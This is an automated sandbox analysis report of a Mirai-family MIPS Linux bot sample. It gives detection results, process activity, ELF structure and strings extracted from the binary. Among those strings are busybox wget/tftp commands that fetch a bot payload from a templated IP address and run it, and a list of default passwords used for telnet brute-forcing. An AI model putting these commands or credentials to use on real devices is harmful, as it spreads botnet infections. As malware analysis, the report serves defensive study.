Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
na.elf

Overview

General Information

Sample name:na.elf
Analysis ID:1530606
MD5:2b0caf52e5e7d8967ce6ad262f194966
SHA1:71cef25f6bc45bdecd8ba77ec5c18a7795cc4bd4
SHA256:26a240e366d95b7fd6b58e1ac79304334b30a910415a224c31f585f7b49cfaa2
Tags:elfMiraiuser-abuse_ch
Infos:

Detection

Mirai
Score:72
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Deletes system log files
Sample tries to access files in /etc/config/ (typical for OpenWRT routers)
Creates hidden files and/or directories
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1530606
Start date and time:2024-10-10 10:31:45 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 6s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:na.elf
Detection:MAL
Classification:mal72.troj.evad.linELF@0/0@0/0
  • Skipping network analysis since amount of network traffic is too extensive
  • VT rate limit hit for: na.elf
Command:/tmp/na.elf
PID:6270
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
thIs wEek on xLaB lEarNs nOthinG xd
Standard Error:
  • system is lnxubuntu20
  • dash New Fork (PID: 6240, Parent: 4331)
  • rm (PID: 6240, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.tZjZy5SILM /tmp/tmp.JTu1nCT417 /tmp/tmp.9lBcOe8jxo
  • dash New Fork (PID: 6241, Parent: 4331)
  • rm (PID: 6241, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.tZjZy5SILM /tmp/tmp.JTu1nCT417 /tmp/tmp.9lBcOe8jxo
  • na.elf (PID: 6270, Parent: 6173, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/na.elf
    • na.elf New Fork (PID: 6274, Parent: 6270)
    • na.elf New Fork (PID: 6276, Parent: 6270)
    • na.elf New Fork (PID: 6279, Parent: 6270)
      • na.elf New Fork (PID: 6281, Parent: 6279)
  • cleanup
SourceRuleDescriptionAuthorStrings
na.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    SourceRuleDescriptionAuthorStrings
    6270.1.00007f25e0400000.00007f25e0419000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: na.elfAvira: detected
      Source: na.elfReversingLabs: Detection: 28%
      Source: na.elfString: ash|login|wget|curl|tftp|ntpdate
      Source: na.elfString: '/proc//exe|ash|login|wget|curl|tftp|ntpdate/fdsocket|proc/usr/bin/usr/sbin/system/mnt/mtd/app/org/z/zbin/home/app/dvr/bin/duksan/userfs/mnt/app/usr/etc/dvr/main/usr/local/var/bin/tmp/sqfs/z/bin/dvr/mnt/mtd/zconf/gm/bin/home/process/var/challenge/usr/lib/lib/systemd//usr/lib/systemd/system/system/bin//mnt//home/helper/home/davinci/usr/libexec//sbin//bin/
      Source: /tmp/na.elf (PID: 6270)Socket: 127.0.0.1:1234Jump to behavior
      Source: na.elfString found in binary or memory: http://%d.%d.%d.%d/la.bot.%s
      Source: Initial sampleString containing 'busybox' found: /bin/busybox tftp -r la.bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet
      Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://%d.%d.%d.%d/la.bot.%s -O -> .t; /bin/busybox chmod 777 .t; ./.t telnet; >.t
      Source: Initial sampleString containing 'busybox' found: /bin/busybox BOT
      Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/busybox || while read i; do /bin/busybox echo $i; done < /bin/busybox || /bin/busybox dd if=/bin/busybox bs=22 count=1
      Source: Initial sampleString containing 'busybox' found: /bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
      Source: Initial sampleString containing 'busybox' found: /bin/busybox wget; /bin/busybox tftp; /bin/busybox echo; /bin/busybox BOT
      Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
      Source: Initial sampleString containing 'busybox' found: /bin/busybox echo '%s\c' %s %s && /bin/busybox echo '\x45\x43\x48\x4f\x44\x4f\x4e\x45\c'
      Source: Initial sampleString containing 'busybox' found: /bin/busybox tftp -r la.bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet/bin/busybox wget http://%d.%d.%d.%d/la.bot.%s -O -> .t; /bin/busybox chmod 777 .t; ./.t telnet; >.t\x%02xsh
      Source: Initial sampleString containing 'busybox' found: /bin/busybox BOTbuf = %s
      Source: Initial sampleString containing 'busybox' found: >%st && cd %s && >retrieve; >.t/bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
      Source: Initial sampleString containing 'busybox' found: armx86_64mipsmipselsuperhpowerpcsparcget: applet not foundftp: applet not foundcho: applet not found>>>/bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
      Source: Initial sampleString containing 'busybox' found: retrieve/bin/busybox echo '%s\c' %s %s && /bin/busybox echo '\x45\x43\x48\x4f\x44\x4f\x4e\x45\c'
      Source: Initial sampleString containing potential weak password found: service
      Source: Initial sampleString containing potential weak password found: guest
      Source: Initial sampleString containing potential weak password found: admin
      Source: Initial sampleString containing potential weak password found: 123456
      Source: Initial sampleString containing potential weak password found: default
      Source: Initial sampleString containing potential weak password found: 54321
      Source: Initial sampleString containing potential weak password found: 12345678
      Source: Initial sampleString containing potential weak password found: 654321
      Source: Initial sampleString containing potential weak password found: support
      Source: Initial sampleString containing potential weak password found: password
      Source: Initial sampleString containing potential weak password found: supervisor
      Source: Initial sampleString containing potential weak password found: administrator
      Source: ELF static info symbol of initial sample.symtab present: no
      Source: classification engineClassification label: mal72.troj.evad.linELF@0/0@0/0

      Data Obfuscation

      barindex
      Source: /tmp/na.elf (PID: 6276)File: /etc/configJump to behavior
      Source: /tmp/na.elf (PID: 6276)Directory: /root/.cacheJump to behavior
      Source: /tmp/na.elf (PID: 6276)Directory: /root/.sshJump to behavior
      Source: /tmp/na.elf (PID: 6276)Directory: /root/.configJump to behavior
      Source: /tmp/na.elf (PID: 6276)Directory: /root/.localJump to behavior
      Source: /tmp/na.elf (PID: 6276)Directory: /tmp/.X11-unixJump to behavior
      Source: /tmp/na.elf (PID: 6276)Directory: /tmp/.Test-unixJump to behavior
      Source: /tmp/na.elf (PID: 6276)Directory: /tmp/.font-unixJump to behavior
      Source: /tmp/na.elf (PID: 6276)Directory: /tmp/.ICE-unixJump to behavior
      Source: /tmp/na.elf (PID: 6276)Directory: /tmp/.XIM-unixJump to behavior
      Source: /tmp/na.elf (PID: 6276)Directory: /etc/.javaJump to behavior
      Source: /usr/bin/dash (PID: 6240)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.tZjZy5SILM /tmp/tmp.JTu1nCT417 /tmp/tmp.9lBcOe8jxoJump to behavior
      Source: /usr/bin/dash (PID: 6241)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.tZjZy5SILM /tmp/tmp.JTu1nCT417 /tmp/tmp.9lBcOe8jxoJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: /tmp/na.elf (PID: 6276)Log files deleted: /var/log/kern.logJump to behavior
      Source: /tmp/na.elf (PID: 6270)Queries kernel information via 'uname': Jump to behavior
      Source: na.elf, 6270.1.000055dec9d45000.000055dec9ded000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mipsel
      Source: na.elf, 6270.1.00007ffcbf9cc000.00007ffcbf9ed000.rw-.sdmpBinary or memory string: ;dx86_64/usr/bin/qemu-mipsel/tmp/na.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/na.elf
      Source: na.elf, 6270.1.000055dec9d45000.000055dec9ded000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mipsel
      Source: na.elf, 6270.1.00007ffcbf9cc000.00007ffcbf9ed000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsel

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: na.elf, type: SAMPLE
      Source: Yara matchFile source: 6270.1.00007f25e0400000.00007f25e0419000.r-x.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: na.elf, type: SAMPLE
      Source: Yara matchFile source: 6270.1.00007f25e0400000.00007f25e0419000.r-x.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting
      Valid AccountsWindows Management Instrumentation1
      Scripting
      Path Interception1
      Hidden Files and Directories
      1
      Brute Force
      11
      Security Software Discovery
      Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Indicator Removal
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      File Deletion
      Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
      No configs have been found
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Number of created Files
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1530606 Sample: na.elf Startdate: 10/10/2024 Architecture: LINUX Score: 72 20 Antivirus / Scanner detection for submitted sample 2->20 22 Multi AV Scanner detection for submitted file 2->22 24 Yara detected Mirai 2->24 7 dash rm na.elf 2->7         started        9 dash rm 2->9         started        process3 process4 11 na.elf 7->11         started        14 na.elf 7->14         started        16 na.elf 7->16         started        signatures5 26 Sample tries to access files in /etc/config/ (typical for OpenWRT routers) 11->26 28 Deletes system log files 11->28 18 na.elf 14->18         started        process6
      SourceDetectionScannerLabelLink
      na.elf29%ReversingLabsLinux.Backdoor.Gafgyt
      na.elf100%AviraEXP/ELF.Mirai.W
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No contacted domains info
      NameSourceMaliciousAntivirus DetectionReputation
      http://%d.%d.%d.%d/la.bot.%sna.elffalse
        unknown
        No contacted IP infos
        No context
        No context
        No context
        No context
        No context
        No created / dropped files found
        File type:ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
        Entropy (8bit):4.9332172845467035
        TrID:
        • ELF Executable and Linkable format (generic) (4004/1) 100.00%
        File name:na.elf
        File size:128'312 bytes
        MD5:2b0caf52e5e7d8967ce6ad262f194966
        SHA1:71cef25f6bc45bdecd8ba77ec5c18a7795cc4bd4
        SHA256:26a240e366d95b7fd6b58e1ac79304334b30a910415a224c31f585f7b49cfaa2
        SHA512:b5d037a7caeeeabbcfc05a9b62c12622870f6d61a3b916ac80f61b0eab22dc274df7d02e8c4ff7334dc9074c17307c4a52ca8c38f1ff1c89f58f7f1ccea7b52d
        SSDEEP:1536:AmbdXGuJxQ1lmoGWGO/+9MBLVKvyPXgQXE9ZTUdY7oew11S07HI:A4XBJxQT5Ge/+ubgYE9G+fwnS07
        TLSH:DAC3E70ABF500FBBEC6BCD3B05E91B0A358CA51721A47B767674C92CF91A14B4AD3C64
        File Content Preview:.ELF....................`.@.4...0.......4. ...(...............@...@...........................E...E.$q..t...........Q.td...............................<Ll.'!......'.......................<(l.'!... .........9'.. ........................<.k.'!...$.......``9

        ELF header

        Class:ELF32
        Data:2's complement, little endian
        Version:1 (current)
        Machine:MIPS R3000
        Version Number:0x1
        Type:EXEC (Executable file)
        OS/ABI:UNIX - System V
        ABI Version:0
        Entry Point Address:0x400260
        Flags:0x1007
        ELF Header Size:52
        Program Header Offset:52
        Program Header Size:32
        Number of Program Headers:3
        Section Header Offset:127792
        Section Header Size:40
        Number of Section Headers:13
        Header String Table Index:12
        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
        NULL0x00x00x00x00x0000
        .initPROGBITS0x4000940x940x8c0x00x6AX004
        .textPROGBITS0x4001200x1200x15fb00x00x6AX0016
        .finiPROGBITS0x4160d00x160d00x5c0x00x6AX004
        .rodataPROGBITS0x4161300x161300x20800x00x2A0016
        .ctorsPROGBITS0x4581b40x181b40x80x00x3WA004
        .dtorsPROGBITS0x4581bc0x181bc0x80x00x3WA004
        .data.rel.roPROGBITS0x4581c80x181c80x5c0x00x3WA004
        .dataPROGBITS0x4582300x182300x6ac00x00x3WA0016
        .gotPROGBITS0x45ecf00x1ecf00x5e80x40x10000003WAp0016
        .sbssNOBITS0x45f2d80x1f2d80x3c0x00x10000003WAp004
        .bssNOBITS0x45f3200x1f2d80x63080x00x3WA0016
        .shstrtabSTRTAB0x00x1f2d80x560x00x0001
        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
        LOAD0x00x4000000x4000000x181b00x181b05.54930x5R E0x10000.init .text .fini .rodata
        LOAD0x181b40x4581b40x4581b40x71240xd4741.80140x6RW 0x10000.ctors .dtors .data.rel.ro .data .got .sbss .bss
        GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
        Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

        System Behavior

        Start time (UTC):08:32:29
        Start date (UTC):10/10/2024
        Path:/usr/bin/dash
        Arguments:-
        File size:129816 bytes
        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

        Start time (UTC):08:32:29
        Start date (UTC):10/10/2024
        Path:/usr/bin/rm
        Arguments:rm -f /tmp/tmp.tZjZy5SILM /tmp/tmp.JTu1nCT417 /tmp/tmp.9lBcOe8jxo
        File size:72056 bytes
        MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

        Start time (UTC):08:32:29
        Start date (UTC):10/10/2024
        Path:/usr/bin/dash
        Arguments:-
        File size:129816 bytes
        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

        Start time (UTC):08:32:29
        Start date (UTC):10/10/2024
        Path:/usr/bin/rm
        Arguments:rm -f /tmp/tmp.tZjZy5SILM /tmp/tmp.JTu1nCT417 /tmp/tmp.9lBcOe8jxo
        File size:72056 bytes
        MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

        Start time (UTC):08:32:34
        Start date (UTC):10/10/2024
        Path:/tmp/na.elf
        Arguments:/tmp/na.elf
        File size:5773336 bytes
        MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

        Start time (UTC):08:32:35
        Start date (UTC):10/10/2024
        Path:/tmp/na.elf
        Arguments:-
        File size:5773336 bytes
        MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

        Start time (UTC):08:32:35
        Start date (UTC):10/10/2024
        Path:/tmp/na.elf
        Arguments:-
        File size:5773336 bytes
        MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

        Start time (UTC):08:32:35
        Start date (UTC):10/10/2024
        Path:/tmp/na.elf
        Arguments:-
        File size:5773336 bytes
        MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

        Start time (UTC):08:32:35
        Start date (UTC):10/10/2024
        Path:/tmp/na.elf
        Arguments:-
        File size:5773336 bytes
        MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9